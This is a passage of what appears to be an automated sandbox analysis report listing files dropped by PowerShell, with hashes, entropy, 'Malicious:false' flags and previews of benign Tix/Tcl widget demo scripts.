                                                                                                                                                                                                                      SSDEEP:48:QN3yXvs6TSk1Rlu2NMD7U4y1qhD7HRB3XFP0Fjpurx0+qkUFPN9fZWjr4ksJHeir:hfPOElCX7lP50+q9PzfZKdW93b
                                                                                                                                                                                                                      MD5:D2AD1D9F757B3C4C9DA13DA44D8B99F1
                                                                                                                                                                                                                      SHA1:025B10F7C9DD84CBB17C6D74E45D20B0F538A13D
                                                                                                                                                                                                                      SHA-256:2B2735CBB38B8732AA0C6F21CD551DABA46B7F87AF90DACDB62CE1E504CB2B8A
                                                                                                                                                                                                                      SHA-512:A1ED26F03EA3DB1630F72D496882D853464B563875810B91F26A6E781D09BA67144BD5A5AC9DB43ABE1AFDF6BEF31E3083D631B64A22AE91A0C95853AB5C01CB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: SListBox.tcl,v 1.4 2008/02/27 22:17:27 hobbs Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixScrolledListBox widget...#....proc RunSample {w} {.... # We create the frame and the two ScrolledListBox widgets.. # at the top of the dialog box.. #.. frame $w.top -relief raised -bd 1.... # The first ScrolledListBox widget always shows both scrollbars.. #.. tixScrolledListBox $w.top.a -scrollbar both.. pack $w.top.a -expand yes -fill both -padx 10 -pady 10 -side left.... # The second ScrolledListBox widget shows the scrollbars only when.. # needed...
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1612
                                                                                                                                                                                                                      Entropy (8bit):4.748365090211464
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:YAyXv9VfyEZQ1/MBvD7Jnm51qrSRtr5PflmrJMP1Ri:Ybffv22OxVf0a3i
                                                                                                                                                                                                                      MD5:6F2DF668A2BB5F7E1F9C7D686C041C9B
                                                                                                                                                                                                                      SHA1:30066558B68EE25448A173D973CD33E5349D7D6C
                                                                                                                                                                                                                      SHA-256:95D4EE51467F8B4F8EA2EC1031F122181F12F66A1F408D343C55C4C6B5150F3D
                                                                                                                                                                                                                      SHA-512:6021AE76A92A44D0D4D5B66C488361C82D1DAE042480616F9EC8986128DFB3CE959F1246F3F1FD5CEA17EFB4580A8D88C0985FA2E56FAAC462FE228FF2FA5E26
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: STList1.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# Demonstrates the scrolled tlist widget..#....proc RunSample {w} {.. set top [frame $w.f -bd 1 -relief raised].. set box [tixButtonBox $w.b -bd 1 -relief raised].... pack $box -side bottom -fill both.. pack $top -side top -fill both -expand yes.... # Create the scrolled tlist.. #.. tixScrolledTList $top.st -options {...tlist.orient vertical...tlist.selectMode single.. }.. pack $top.st -expand yes -fill both -padx 10 -pady 10.... # Insert a list of numbers into the tlist subwidget.. #..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2473
                                                                                                                                                                                                                      Entropy (8bit):4.750201603410602
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:N+yXv9VfyEZQ1/Nd4D0Lvlh/dBuRD7VBMiD7X9lm51qrSCOtGtr5PflmrJMP1Ri:NVffv2VHZ1uBMFPQVf0a3i
                                                                                                                                                                                                                      MD5:4E51CB057BFC9D68DFAB66BD4E955AC0
                                                                                                                                                                                                                      SHA1:9312E6F4A6D2B956E4A8C46B8A3C6B023A4C1650
                                                                                                                                                                                                                      SHA-256:A96ED8063A1579C0895B9AE8D93E77DE2120D93FE751A4FEA58D2BABBFF1B20B
                                                                                                                                                                                                                      SHA-512:A2748A17D4E89EBFCB9F729BD044F4F7EBEEFE85B554673A96F89166687F80473BC56250537414F29D0426226D83223BCB5179D828BF83D13BBB5BE5177B4ABF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: STList2.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# Demonstrates the scrolled tlist widget..#....proc RunSample {w} {.. set top [frame $w.f -bd 1 -relief raised].. set box [tixButtonBox $w.b -bd 1 -relief raised].... pack $box -side bottom -fill both.. pack $top -side top -fill both -expand yes.... # Create the Paned Window to contain two scrolled tlist's.. #.. set p [tixPanedWindow $top.p -orient horizontal].. pack $p -expand yes -fill both -padx 4 -pady 4.... set p1 [$p add pane1 -expand 1].. set p2 [$p add pane2 -expand 1].... $p1 conf
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3090
                                                                                                                                                                                                                      Entropy (8bit):4.740422134863133
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:Zfbv2yHZo3gP8PfgusvRlTaIX4fR90e53i:Zz2yH63Ko9svRp1X4fR906y
                                                                                                                                                                                                                      MD5:BACE70A83588DA901A08B0869A57A20C
                                                                                                                                                                                                                      SHA1:6D1DE3BFE3A0B90FC6E5DC662C5434F9BF6ED1E9
                                                                                                                                                                                                                      SHA-256:B7F04FC61AAA7167BF7C1AA8BE5BA59556015E30B084F1EAB9A5F040AC4D9D3A
                                                                                                                                                                                                                      SHA-512:EB8E6242475A01EECAC63C786B087379A2662CB57877860B3BF350A24B50EBC4928FF358C86D371BA26C2F5F8FC1C33A20B2F37E838329F1DBB468088B6615AF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: STList3.tcl,v 1.4 2004/03/28 02:44:56 hobbs Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# Demonstrates the use of DirTree with the TList ..#....proc RunSample {w} {.. set top [frame $w.f -bd 1 -relief raised].. set box [tixButtonBox $w.b -bd 1 -relief raised].... pack $box -side bottom -fill both.. pack $top -side top -fill both -expand yes.... # Create the Paned Window to contain the dirtree and scrolled tlist.. #.. set p [tixPanedWindow $top.p -orient horizontal].. pack $p -expand yes -fill both -padx 4 -pady 4.... set p1 [$p add pane1 -expand 1].. set p2 [$p add pane2 -expand 4]..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2617
                                                                                                                                                                                                                      Entropy (8bit):4.7775925732113995
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:PyXvXTSNluNBeD7P9fZWjr4ks1CCjpmNg/QsYH4VKflxeiP1Rb:afXONlkMfZKdoPpkgXYYVKflx93b
                                                                                                                                                                                                                      MD5:58BF72EC201AFE126458D2C761624052
                                                                                                                                                                                                                      SHA1:C38F22BD62ADA978E2DB0E677BD719FFACB5880B
                                                                                                                                                                                                                      SHA-256:215B50D920B10740ACC10DDF4F6EBFE5123EF8806D5099C1906D424CDACA0525
                                                                                                                                                                                                                      SHA-512:B7783001CFC6A70FA73D02300797F57D421561CAC0665F10C57671E484D7F8EF35EC412EC7E745FC62C6BAD0F9C7BD7681E451F30FACDB4D53299322CA799838
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: SText.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixScrolledText widget...#....proc RunSample {w} {.... # We create the frame and the ScrolledText widget.. # at the top of the dialog box.. #.. frame $w.top -relief raised -bd 1.... # Create a Scrolled Text widget... #.. tixScrolledText $w.top.a.. pack $w.top.a -expand yes -fill both -padx 10 -pady 10 -side left.... # Use a ButtonBox to hold the buttons... #.. tixButtonBox $w.box -orientation horizontal.. $w.box add ok -text Ok -underline 0
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2807
                                                                                                                                                                                                                      Entropy (8bit):4.744066417650343
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:qyXvUTSulurP4Nd0qeD7nFcDo6byufcMJbgwl9TSC9fZWjr4ks18eiP1Rb:5fUOul2POlUZsvffbgwl9TScfZKdo89r
                                                                                                                                                                                                                      MD5:199D62AD6CBB864777868564348EAC1C
                                                                                                                                                                                                                      SHA1:31472F5628F8CB3824F11D061244824331DA7E47
                                                                                                                                                                                                                      SHA-256:63BBFC5CB9977FE801DA0FD33352027C13DEF4CE851EA7F4B2255FBEA36EF5A5
                                                                                                                                                                                                                      SHA-512:950C935BC1DC42483C4A2A747E00F42C5F271CEC83C23A7CF3112D951F8551BA5B2B21858075DA6E9C27A4E46C67BFA73211BDE03B4BB409F06E774ABBD3AE06
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: SWindow.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixScrolledWindow widget...#....proc RunSample {w} {.... # We create the frame and the ScrolledWindow widget.. # at the top of the dialog box.. #.. frame $w.top -relief raised -bd 1.... # Create a complex window inside the ScrolledWindow widget... # ScrolledWindow are very convenient: unlink the canvas widget,.. # you don't need to specify the scroll-redions for the.. # ScrolledWindow. It will automatically adjust itself to fit.. # size of the "window" sub
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3433
                                                                                                                                                                                                                      Entropy (8bit):4.776901222567246
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:2AyXv0nKHmAQgBpeJj7+g2epp4yQ4M7+oPBB2pUYRl3pMZNFPY9fZsTrhbsJGhh+:2bf0KHmATSdr/Q4EBAfewfZsT1f+
                                                                                                                                                                                                                      MD5:722EC43E57FA9F7732F51C4672AA06F4
                                                                                                                                                                                                                      SHA1:0EE75F46523DDD612F62C7EE2C4289A098E139A6
                                                                                                                                                                                                                      SHA-256:047A63479CEC283E73987346CB9AF9DD0157F39AFB4669509C5BF7EBBC1D16DE
                                                                                                                                                                                                                      SHA-512:08EC044C24C3C7169831F3C7EC58C72B844BA21482E360AD2EF63A3BB432F453B79E3BDCC1A9C0EBB8FD8B3707A362B3F27AFBEC0995D781235FE27C89B4948C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: Select.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixSelect widget...#..proc RunSample {w} {.. global demo_dir.... # Create the frame on the top of the dialog box with two tixSelect.. # widgets inside... #.. frame $w.top.... # There can be one and only type of justification for any piece of text... # So we set -radio to be true. Also, -allowzero is set to false: the user.. # cannot select a "none" justification.. #.. tixSelect $w.top.just -allowzero false -radio true \...-label "Justification: "\...-opt
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2351
                                                                                                                                                                                                                      Entropy (8bit):4.873627783053149
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:byXvzuXBLUAB8gvGrwxF9lbSRdQPHs347mT1u01yTH1Kn1hyF+P1Ri:efgUALvCMNJm47mTc0EH0nH3i
                                                                                                                                                                                                                      MD5:11B7D0A26C288ED08FA8F9A142930F47
                                                                                                                                                                                                                      SHA1:5E445D701BC1C84306EDE466079F8CEB75FAB865
                                                                                                                                                                                                                      SHA-256:DF32E7616D982D73278FBA4E418E9FD78777CAEFF9C08A0E8C1B86B3962E8910
                                                                                                                                                                                                                      SHA-512:85FD8203C28868FDCF196BBA8B6674B53C34A09B3F7E1CB5FE739DC1E5A73C3C69F6D50D7CD0355E366FCDE5306F8D9B4AC1B412B1D11C16D1CBC3B4069AB457
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: StdBBox.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixStdButtonBox widget, which is a..# group of "Standard" buttons for Motif-like dialog boxes...#..proc RunSample {w} {.... # Create the label on the top of the dialog box.. #.. label $w.top -padx 20 -pady 10 -border 1 -relief raised -text \..."This dialog box is\n a demostration of the\n tixStdButtonBox widget" \...-justify center -anchor c.... # Create the button box. We also do some manipulation of the.. # button widgets inside: we disable the help button and chang
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2744
                                                                                                                                                                                                                      Entropy (8bit):4.7400121876074515
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:udyXvWFrSQlumBD7PBPErrSO7r4r9qQyeJJfJ5JoZG9fZWjr4ksJHeiP1Rs9a:5frQlPZOL7cpqInRYWfZKdW93Oa
                                                                                                                                                                                                                      MD5:174B68660C0163601FF0C9941AE41E88
                                                                                                                                                                                                                      SHA1:6725F14BDB65011BF3A5B17BBD8465AB640F9B64
                                                                                                                                                                                                                      SHA-256:22396DD36FBDAB8EA59EE5A8DE697398A63A86A1763CEA84B9D7F9D5405D5407
                                                                                                                                                                                                                      SHA-512:8D9138D93255B7741CF40FC8F742A6904A3295881E2D358BA3D535E9AAE96026CA7913AFD6440F25251A4C3E2CC8678073EDD32F5E4E3C4934ED40FD5EA1A289
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: Tree.tcl,v 1.4 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates how to use the TixTree widget to display..# hierachical data (A hypothetical DOS disk drive)...#....proc RunSample {w} {.... # We create the frame and the ScrolledHList widget.. # at the top of the dialog box.. #.. frame $w.top -relief raised -bd 1.... # Create a TixTree widget to display the hypothetical DOS disk drive.. # .. #.. tixTree $w.top.a -options {...separator "\\".. }.... pack $w.top.a -expand yes -fill both -padx 10 -pady 10 -side left.. .. set tree $w.top
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3009
                                                                                                                                                                                                                      Entropy (8bit):4.163624754942491
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:gyXvgCoWkSzphud3rDPfZWjr4ksJHeiP1Rb:7fzkSVhe3fZKdW93b
                                                                                                                                                                                                                      MD5:4E438F3F65A95AD218F1C3C2E383AC93
                                                                                                                                                                                                                      SHA1:A0C570763A65EA011AEE287514A16617F24F8175
                                                                                                                                                                                                                      SHA-256:A5CD5EED2739FCD01D7F2F5942C65F8E3D3DEFF281C4A8E8FBBA80DF37E379BA
                                                                                                                                                                                                                      SHA-512:73BB755CD81D4B92C2856B0296461158256FDA6C1054843FD98FF0D448ACD749E087AF3E5586246B64D57B3AF3271115225FD4B0333BD8B35792A5327834256F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: Xpm.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of XPM images...#....proc RunSample {w} {.... set hard_disk_pixmap {/* XPM */...static char * drivea_xpm[] = {... /* width height ncolors chars_per_pixel */... "32 32 5 1",... /* colors */... " .s None.c None",... "..c #000000000000",... "X.c white",... "o.c #c000c000c000",... "O.c #800080008000",... /* pixels */... " ",... " ",... " ",... "
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3557
                                                                                                                                                                                                                      Entropy (8bit):4.273858055930155
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:PyXv1CoWkSzpISNluVd8TuW1WWp9fZWjr4ks1KeiP1N:afykSVDNlAKTuuWQfZKdoK9/
                                                                                                                                                                                                                      MD5:3FB6000F37CCA6F51B2933166642DDBB
                                                                                                                                                                                                                      SHA1:CC62588722C8AE3BECB65AA6A6C352C6878AE0E8
                                                                                                                                                                                                                      SHA-256:74634645297A240D0C216D6455C2FE918AF2857A1F0975A3FF0B11B6F1633193
                                                                                                                                                                                                                      SHA-512:2B7C49E0135037213F1DC7D085DD2FCA3F9FB584A40B31A909A5668C2E434D6536396F4C40CA70C539140D1CA16223ACC13C439793182D49EAB3FAFF266D43CB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: Xpm1.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of XPM images in the menu...#....proc RunSample {w} {.... set hard_disk_pixmap {/* XPM */...static char * drivea_xpm[] = {... /* width height ncolors chars_per_pixel */... "32 32 5 1",... /* colors */... " .s None.c None",... "..c #000000000000",... "X.c white",... "o.c #c000c000c000",... "O.c #800080008000",... /* pixels */... " ",... " ",... " ",... "
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3897
                                                                                                                                                                                                                      Entropy (8bit):4.791128330535721
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:eLaVhMn0Vk6pPrWumXiOkFg+RO22ANFAewbwJEFzSSTPgPOHPp4GPZlwKqUSi:eeVqn0Vk0PrWumXiOke+RO22ANFAewbh
                                                                                                                                                                                                                      MD5:86734F3397F82895CEEA893D5294BF05
                                                                                                                                                                                                                      SHA1:1DC7EEC937CF7C6A08EAE59F09074C57B19E3532
                                                                                                                                                                                                                      SHA-256:D94E63965733460544427BEB671228ED11123FFA51AE8D1D28FB04AD2B81F88B
                                                                                                                                                                                                                      SHA-512:95CA72483A3383B5D3583125FD3098A0B7C30EB087E3CC475FF1DD92EFE260F5F610DC757A17247AC391F70DF99EFABAEF3E73FDE2B6FFCAD090EC1656C61E71
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Tcl autoload index file, version 2.0..# This file is generated by the "auto_mkindex" command..# and sourced to set up indexing information for one or..# more commands. Typically each line is a command that..# sets an element in the auto_index array, where the..# element name is the name of a command and the value is..# a script that loads the command.....set auto_index(MkChoosers) [list source [file join $dir MkChoose.tcl]]..set auto_index(MkCombo) [list source [file join $dir MkChoose.tcl]]..set auto_index(stCmd) [list source [file join $dir MkChoose.tcl]]..set auto_index(stValidate) [list source [file join $dir MkChoose.tcl]]..set auto_index(MkControl) [list source [file join $dir MkChoose.tcl]]..set auto_index(MkSelect) [list source [file join $dir MkChoose.tcl]]..set auto_index(MkOptMenu) [list source [file join $dir MkChoose.tcl]]..set auto_index(MkFileEnt) [list source [file join $dir MkChoose.tcl]]..set auto_index(MkFileBox) [list source [file join $dir MkChoose.tcl]]..set au
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):9356
                                                                                                                                                                                                                      Entropy (8bit):4.940860035098135
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:r3dJThiDOE5UDx8ZikCU7YN3qRVWt1hJjZDLvxPofEU0U5l6DzfKe:rtJT5ECDDfO6LhofEvUmF
                                                                                                                                                                                                                      MD5:D675F0E73C52A091F68C8E24CC0268AA
                                                                                                                                                                                                                      SHA1:B56AC65223BE11F07A87DDE7072EF91C8035A825
                                                                                                                                                                                                                      SHA-256:A4C9022069CF000A5EE4A77DC537ACB107FDFF1D3672F7B044870983FB6327B2
                                                                                                                                                                                                                      SHA-512:F7727039385463F8CC2E42C09AF49F40B544798407FC5DF468FEA5C000BCFA8350A810DF9B115B905E8909DAF30E94F01B66ABDE84995F761B2842C0A2E2D581
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..# tixDemo --..#..# .This is a demo program of all the available Tix widgets. If..#.have installed Tix properly, you can execute this program..#.by changing to this directory and executing..#.the following in csh..#..#..% env TIX_LIBRARY=../library tixwish tixwidgets.tcl..#..#.Or this in sh..#..#..$ TIX_LIBRARY=../library tixwish tixwidgets.tcl..#..#----------------------------------------------------------------------..#..#.This file has not been properly documented. It is NOT intended..#.to be used as an introductory demo program about Tix..#.programming. For such demos, please see the files in the..#.demos/samples directory or go to the "Samples" page in the..#."widget demo"..#..#..# Copyright (c) 1996, Expert Interface Technologies..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....package require Tix..tix initstyl
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:POSIX shell script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13761
                                                                                                                                                                                                                      Entropy (8bit):4.662429791492026
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:dt9POJ5YezSnq5Nc3DfMGP6ZNq1Sj/JXU7abCjH7x7HtnzM5nSAom:drPOnYpDfN6ZkOl/uBHJcD
                                                                                                                                                                                                                      MD5:271451AEC3001E8B5288F7D7DED1113D
                                                                                                                                                                                                                      SHA1:9C74C551CA4E54C02942C9426324A55439686F04
                                                                                                                                                                                                                      SHA-256:82FC32FC51612270DE8D70CC14A20AB2428F50A782DF707D2ACA1083F0455F91
                                                                                                                                                                                                                      SHA-512:A183FC1D14A3C6043A28B591A4BE9C01C8A98A31590659400D76D6A15C6658B39FD45FD56F126FFFFB98077511C15648E69B459EA7246FFBD6E60875EEADBD8B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#!/bin/sh..# the next line restarts using wish \..exec wish "$0" "$@"....# widget --..#..# This script demonstrates the various widgets provided by Tix,..# along with many of the features of the Tix library. This file..# only contains code to generate the main window for the..# application, which invokes individual demonstrations. The..# code for the actual demonstrations is contained in separate..# ".tcl" files in the samples/ subdirectory, which are sourced..# by this script as needed...#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1996 Sun Microsystems, Inc...# Copyright (c) 1998-2000 Scriptics Corporation...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...# $Id: widget,v 1.7 2008/03/17 22:58:51 hobbs Exp $....package require Tix..tix initstyle..eval destroy [w
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4165
                                                                                                                                                                                                                      Entropy (8bit):4.935157875636426
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:FDCHBHWSwaO/bfROXxXE9pmTY3kk3fE7lj3/q+LKptBIbq+BNF:VCHBHWSwaOTfR6IETY3kk3Mj3/q+LiDI
                                                                                                                                                                                                                      MD5:4F8460EA8452C0251901814BDA5A1D71
                                                                                                                                                                                                                      SHA1:7F26F336422E3648AB1534793049F29458EBE53E
                                                                                                                                                                                                                      SHA-256:F6283544BE918381872D3B483D6EF1FE240A6DCD45AB013A28EB9866644A08F1
                                                                                                                                                                                                                      SHA-512:53B2DFFBB35BEAB67C452F7F713D127963DD96754DDE35254562EE12DFB43ACF6FD59608E032EA58185F580F681D1BDDD7E372665AFB3086CCFA32AD004A03D9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: fs.tcl,v 1.6 2004/03/28 02:44:57 hobbs Exp $..#..# File system routines to handle some file system variations..# and how that interoperates with the Tix widgets (mainly HList)...#..# Copyright (c) 2004 ActiveState....##..## Cross-platform..##....proc tixFSSep {} { return "/" }....proc tixFSNormalize {path} {.. # possibly use tixFSTilde ?.. return [file normalize $path]..}....proc tixFSVolumes {} {.. return [file volumes]..}....proc tixFSAncestors {path} {.. return [file split [file normalize $path]]..}....# how a filename should be displayed..proc tixFSDisplayFileName {path} {.. if {$path eq [file dirname $path]} {...return $path.. } else {...return [file tail $path].. }..}....# dir:..Make a listing of this directory..# showSubDir:.Want to list the subdirectories?..# showFile:.Want to list the non-directory files in this directory?..# showPrevDir:.Want to list ".." as well?..# s
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):154
                                                                                                                                                                                                                      Entropy (8bit):4.649658050432132
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:hZMQ9GnwrWmTv7BM7MVOQlvhZMQ9+Cfu2xQ+l7BM/XADUD5J6fy:hZMQ9uwrWIBSMMQlvhZMQ9+ixQ+pBWWk
                                                                                                                                                                                                                      MD5:508E39D04FB0E3F82DB2EECD548B99B6
                                                                                                                                                                                                                      SHA1:ECE5D3168787B091E813409D160B57FC98FBA767
                                                                                                                                                                                                                      SHA-256:64C64E7B58A13810DAFF8FC3ACA3AA26D790269A6C9F54E161C2FB987A30E5F2
